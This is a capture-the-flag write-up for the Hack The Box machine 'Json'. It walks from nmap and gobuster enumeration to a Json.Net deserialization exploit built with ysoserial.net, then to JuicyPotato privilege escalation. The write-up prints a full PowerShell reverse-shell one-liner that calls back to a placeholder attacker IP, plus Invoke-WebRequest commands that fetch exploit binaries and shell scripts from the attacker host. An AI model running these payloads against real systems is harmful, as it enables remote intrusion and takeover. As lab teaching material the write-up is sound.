Json
Be prepared to reinvent yourself!
Json is a medium difficulty machine running Windows. It tests your knowledge in OSINT, JSON Deserialization and basic Privilege Escalation. I didn’t find anything too overly complicated with this machine. It was obvious as to what needed to be done it was just a matter of finding the right payload and the correct injection point.
Be sure to checkout the Basic Setup section before you get started.
Enumeration
Like always, enumeration is our first port of call. Let’s take a look at the machine and see what we are dealing with.
Portscan
portscan json.htb
Grabbing ports...
Ports grabbed!
Scanning...
Starting Nmap 7.80 ( https://nmap.org ) at 2020-01-13 10:05 PST
Nmap scan report for json.htb (10.10.10.158)
Host is up (0.31s latency).
PORT STATE SERVICE VERSION
21/tcp open ftp FileZilla ftpd
| ftp-syst:
|_ SYST: UNIX emulated by FileZilla
80/tcp open http Microsoft IIS httpd 8.5
| http-methods:
|_ Potentially risky methods: TRACE
|_http-server-header: Microsoft-IIS/8.5
|_http-title: Json HTB
135/tcp open msrpc Microsoft Windows RPC
139/tcp open netbios-ssn Microsoft Windows netbios-ssn
445/tcp open microsoft-ds Microsoft Windows Server 2008 R2 - 2012 microsoft-ds
5985/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
47001/tcp open http Microsoft HTTPAPI httpd 2.0 (SSDP/UPnP)
|_http-server-header: Microsoft-HTTPAPI/2.0
|_http-title: Not Found
49152/tcp open msrpc Microsoft Windows RPC
49153/tcp open msrpc Microsoft Windows RPC
49154/tcp open msrpc Microsoft Windows RPC
49155/tcp open msrpc Microsoft Windows RPC
49156/tcp open msrpc Microsoft Windows RPC
49157/tcp open msrpc Microsoft Windows RPC
49158/tcp open msrpc Microsoft Windows RPC
Service Info: OSs: Windows, Windows Server 2008 R2 - 2012; CPE: cpe:/o:microsoft:windows
Host script results:
|_clock-skew: mean: 3h59m58s, deviation: 0s, median: 3h59m58s
|_nbstat: NetBIOS name: JSON, NetBIOS user: <unknown>, NetBIOS MAC: 00:50:56:b9:98:ae (VMware)
|_smb-os-discovery: ERROR: Script execution failed (use -d to debug)
| smb-security-mode:
| authentication_level: user
| challenge_response: supported
|_ message_signing: disabled (dangerous, but default)
| smb2-security-mode:
| 2.02:
|_ Message signing enabled but not required
| smb2-time:
| date: 2020-01-13T22:06:22
|_ start_date: 2020-01-13T15:49:51Ports to take note of here are ftp on port 22, winrm on port 5985 and then there is also smb on port 445, netbios on port 139 and various rpc ports.
We see a version number for IIS but we don’t see one for FileZilla.
A quick connection with netcat reveals that information:
nc json.htb 21
220-FileZilla Server 0.9.60 beta
220-written by Tim Kosse (tim.kosse@filezilla-project.org)
220 Please visit https://filezilla-project.org/Using the searchsploit command we see no immediate results pertaining to the versions found.
Directory Bruteforce
Doing a scan with Gobuster using the dir mode reveals some files and directories:
gobuster dir -u http://json.htb -r -t 30 -w /usr/share/wordlists/dirb/big.txt -x .php,.txt,.html,.asp,.aspx -o gobuster_dir-main.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://json.htb
[+] Threads: 30
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,txt,html
[+] Follow Redir: true
[+] Timeout: 10s
===============================================================
2020/01/13 21:15:32 Starting gobuster
===============================================================
/css (Status: 403)
/files (Status: 403)
/img (Status: 403)
/index.html (Status: 200)
/js (Status: 403)
/login.html (Status: 200)
/views (Status: 403)
===============================================================
2020/01/13 21:18:44 Finished
===============================================================We see two directories of interest files and views. Let’s dig a bit deeper by looking in to views:
gobuster dir -u http://json.htb/views/ -r -t 30 -w /usr/share/wordlists/dirb/big.txt -x .php,.txt,.html,.asp,.aspx -o gobuster_dir-views.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://json.htb/views/
[+] Threads: 30
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,txt,html
[+] Follow Redir: true
[+] Timeout: 10s
===============================================================
2020/01/13 21:32:59 Starting gobuster
===============================================================
/contacto.html (Status: 200)
/forgot.html (Status: 200)
/login.html (Status: 200)
/principal.html (Status: 200)
/productos.html (Status: 200)
===============================================================
2020/01/13 21:36:09 Finished
===============================================================We find some interesting files but no more directories. Let’s check the files directory as well:
gobuster dir -u http://json.htb/files/ -r -t 30 -w /usr/share/wordlists/dirb/big.txt -x .php,.txt,.html,.asp,.aspx -o gobuster_dir-files.txt
===============================================================
Gobuster v3.0.1
by OJ Reeves (@TheColonial) & Christian Mehlmauer (@_FireFart_)
===============================================================
[+] Url: http://json.htb/files/
[+] Threads: 30
[+] Wordlist: /usr/share/wordlists/dirb/big.txt
[+] Status codes: 200,204,301,302,307,401,403
[+] User Agent: gobuster/3.0.1
[+] Extensions: php,txt,html
[+] Follow Redir: true
[+] Timeout: 10s
===============================================================
2020/01/13 22:31:18 Starting gobuster
===============================================================
/password.txt (Status: 200)
===============================================================
2020/01/13 22:42:01 Finished
===============================================================We have a password.txt file! Taking a look at that file all we see is:
Jajaja
Not CorrectDomains
Let’s checkout the main website at http://json.htb:
Interesting. The slow load shows me a dashboard and then redirects to the login.html page. Although this looks like it may be a web app I notice the title of the page as SB Admin 2. I recognise it immediately as a Bootstrap dashboard theme by StartBootstrap. So this site is custom not a known web app.
Like every login page we come across we try the credentials admin:admin which logs us in.
We are presented with the dashboard that we got a glimpse of:
Analyzing the login with Burp Suite we notice the POST call to /api/token/ with Accept: application/json and Content-Type: application/json in the header. There’s our JSON reference.
User
On doing some research online we come across many articles on deserialization and specifically what has been coined Friday the 13th JSON Attacks. In these slides we see a tool that may be of use called ysoserial.net where an example is given to create a payload that pings a machine: ysoserial.exe -f BinaryFormatter -g TypeConfuseDelegate -base64 -c "ping 10.0.0.19".
Refining our command to fit our needs we end up with the following:
PS> cat payload.ps1 | .\ysoserial.exe -o raw -g WindowsIdentity -f Json.Net -o base64 -sThe payload.ps1 file contains the code for a standard PowerShell reverse shell:
cmd /c powershell -nop -c "$client = New-Object System.Net.Sockets.TCPClient('<attacker-ip>',1234);$stream = $client.GetStream();[byte[]]$bytes = 0..65535|%{0};while(($i = $stream.Read($bytes, 0, $bytes.Length)) -ne 0){;$data = (New-Object -TypeName System.Text.ASCIIEncoding).GetString($bytes,0, $i);$sendback = (iex $data 2>&1 | Out-String );$sendback2 = $sendback + 'PS ' + (pwd).Path + '> ';$sendbyte = ([text.encoding]::ASCII).GetBytes($sendback2);$stream.Write($sendbyte,0,$sendbyte.Length);$stream.Flush()};$client.Close()"The result is a base64 encoded output which we will copy to our clipboard:
Now let’s setup our listener:
nc -nlvp 1234Then using Burp Suite we intercept the login and then step forward until we see our GET call to /api/Account. We will then right click and select Send to Repeater (just incase we lose connection). In our Repeater tab we add our payload in the Bearer: section of the header and send it to the server:
Back at our listener we should see a connection:
nc -nlvp 1234
Ncat: Listening on :::1234
Ncat: Listening on 0.0.0.0:1234
Ncat: Connection from 10.10.10.158.
Ncat: Connection from 10.10.10.158:52007.
PS C:\windows\system32\inetsrv> whoami
json\userpool
PS C:\windows\system32\inetsrv> cat C:\Users\userpool\Desktop\user.txt
34459a01f5....9bfb9f52bbNOT: If you don’t see a command prompt hit ENTER.
Just like that we have the user.txt flag. Now onward to root!
Root
Let’s check out what permissions we have:
PS C:\windows\system32\inetsrv> whoami /priv
PRIVILEGES INFORMATION
----------------------
Privilege Name Description State
============================= ========================================= ========
SeAssignPrimaryTokenPrivilege Replace a process level token Disabled
SeIncreaseQuotaPrivilege Adjust memory quotas for a process Disabled
SeAuditPrivilege Generate security audits Disabled
SeChangeNotifyPrivilege Bypass traverse checking Enabled
SeImpersonatePrivilege Impersonate a client after authentication Enabled We see that SeImpersonatePrivilege is enabled so we should be able to use the JuicyPotato exploit.
To get the file on to the machine we start up our webserver on the attacker machine to serve the file:
python3 -m http.server 80Then download from the victim machine:
Invoke-WebRequest http://<attacker-ip>/JuicyPotato.exe -OutFile C:\Windows\Temp\jp.exeWe will use a PowerShell reverse shell again so we download that as well:
Invoke-WebRequest http://<attacker-ip>/shell.ps1 -OutFile C:\Windows\Temp\shell.ps1Once again we setup our listener on the attacker machine:
nc -nlvp 6666And then launch our exploit:
PS> cmd /c '.\jp.exe -l 9999 -p c:\Windows\System32\cmd.exe -a "/c powershell C:\Windows\Temp\shell.ps1" -t * -c {8BC3F05E-D86B-11D0-A075-00C04FB68820}'Back at our listener on the attacker machine we should receive a connection:
nc -nlvp 6666
Ncat: Listening on :::6666
Ncat: Listening on 0.0.0.0:6666
Ncat: Connection from 10.10.10.158.
Ncat: Connection from 10.10.10.158:54779.
PS C:\Windows\system32> whoami
nt authority\system
PS C:\Windows\system32> cat C:\Users\superadmin\Desktop\root.txt
3cc85d1bed....01b991d441Conclusion
Overall this machine was quite fun. It was straight forward and practical considering the misuse of JSON within the realms of website authentication. There have been many examples of this exploit being used in the wild against insecure authentication APIs.
